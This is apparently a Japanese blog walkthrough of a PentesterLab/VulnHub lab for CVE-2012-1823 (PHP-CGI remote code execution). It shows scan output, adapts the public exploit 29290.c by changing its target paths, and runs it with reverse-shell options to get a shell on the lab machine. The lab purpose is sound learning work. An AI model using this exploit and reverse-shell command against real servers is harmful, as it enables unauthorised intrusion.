vulnhub Pentester Lab: CVE-2012-1823: PHP CGI 雑記
Pentester Lab: CVE-2012-1823: PHP CGI
live起動。rootまではいかない。
サービス調査
# nmap -p- 10.10.10.16 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-18 09:50 EDT Nmap scan report for 10.10.10.16 Host is up (0.00042s latency). Not shown: 65533 closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http MAC Address: 08:00:27:F0:F2:A0 (Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) scanned in 22.42 seconds # nmap -p22,80 -sV 10.10.10.16 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-18 09:51 EDT Nmap scan report for 10.10.10.16 Host is up (0.00064s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 5.5p1 Debian 6+squeeze1 (protocol 2.0) 80/tcp open http Apache httpd 2.2.16 ((Debian)) MAC Address: 08:00:27:F0:F2:A0 (Oracle VirtualBox virtual NIC) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 21.04 seconds
気になりどころ
- [port 22] ssh OpenSSH 5.5p1 Debian 6+squeeze1 (protocol 2.0)
- [port 80] http Apache httpd 2.2.16 (Debian)
基本的にsshは攻めなくていいかなぁ。
詳細
sshには目ぼしいものが見当たらなかったので、気にしない。
[port 80] http Apache httpd 2.2.16 (Debian)
# nikto -h 10.10.10.16 - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 10.10.10.16 + Target Hostname: 10.10.10.16 + Target Port: 80 + Start Time: 2020-05-18 10:00:47 (GMT-4) --------------------------------------------------------------------------- + Server: Apache/2.2.16 (Debian) + Retrieved x-powered-by header: PHP/5.3.3-7+squeeze8 + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + No CGI Directories found (use '-C all' to force check all possible dirs) + Server may leak inodes via ETags, header found with file /favicon.ico, inode: 5997, size: 1150, mtime: Thu May 3 22:02:34 2012 + Apache/2.2.16 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch. + Uncommon header 'tcn' found, with contents: list + Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.php + Web Server returns a valid response with junk HTTP methods, this may cause false positives. + OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. + OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. + OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. + OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. + OSVDB-3268: /icons/: Directory indexing found. + OSVDB-3233: /icons/README: Apache default file found. + 7864 requests: 1 error(s) and 15 item(s) reported on remote host + End Time: 2020-05-18 10:01:59 (GMT-4) (72 seconds) --------------------------------------------------------------------------- + 1 host(s) tested # gobuster dir -u http://10.10.10.16/ -w /usr/share/wordlists/dirb/common.txt -q -e http://10.10.10.16/.htpasswd (Status: 403) http://10.10.10.16/.hta (Status: 403) http://10.10.10.16/.htaccess (Status: 403) http://10.10.10.16/all (Status: 200) http://10.10.10.16/favicon.ico (Status: 200) http://10.10.10.16/index.php (Status: 200) http://10.10.10.16/index (Status: 200) http://10.10.10.16/patch (Status: 200) http://10.10.10.16/server-status (Status: 403)
gobusterに乗り換えた。
パット見で目ぼしいものはない。
exploitを確認したところ
# searchsploit apache 2.2. ------------------------------------------------------------------------------------ --------------------------------- Exploit Title | Path ------------------------------------------------------------------------------------ --------------------------------- Apache + PHP < 5.3.12 / < 5.4.2 - cgi-bin Remote Code Execution | php/remote/29290.c Apache + PHP < 5.3.12 / < 5.4.2 - Remote Code Execution + Scanner | php/remote/29316.py
これが出てくる。
以前刺さったときは、「/cgi-bin/」が無いとダメだった気がするのだが。
これが「cve-2012-1823」に当たるもののようだ。
試してみる。
# searchsploit -m 29290 29316
しかし、どちらも刺さらず。
そもそも「/cgi-bin/」が無いのにそこにアクセスさせても意味が無いでしょ。
もしかして、「server-status」があるディレクトリでcgiが動いてると考えればいけるか?
29290.c
のアクセス先の配列を弄ってみた。
373 interpreters[0] = strdup("/cgi-bin/php"); 374 interpreters[1] = strdup("/cgi-bin/php5"); 375 interpreters[2] = strdup("/cgi-bin/php-cgi"); 376 interpreters[3] = strdup("/cgi-bin/php.cgi"); 377 interpreters[4] = strdup(""); //ココ変更
そうして実行すると、
# ./exploit --target 10.10.10.16 --port 80 --protocol http --reverse-ip 10.10.10.3 --reverse-port 8080
ncで待っていたport 8080に帰ってきた!
shell getchu!
after shell getchu
PLのシリーズは脆弱性を学ぶ資料だと思っているのでrootまではいかない。
終わり
- 以前もcgi-bin刺さりそうで刺さらなかったのはアクセス先の所為だったのありそう。